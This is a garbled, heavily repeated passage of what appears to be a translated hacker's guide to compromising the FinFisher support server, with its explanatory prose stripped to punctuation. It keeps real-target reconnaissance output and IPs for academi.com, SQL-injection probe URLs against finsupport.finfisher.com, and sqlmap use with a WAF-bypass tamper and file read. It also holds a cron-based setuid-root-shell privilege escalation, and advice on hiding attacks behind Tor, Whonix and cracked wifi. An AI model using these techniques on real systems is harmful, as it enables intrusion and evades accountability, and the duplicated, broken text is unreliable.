chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

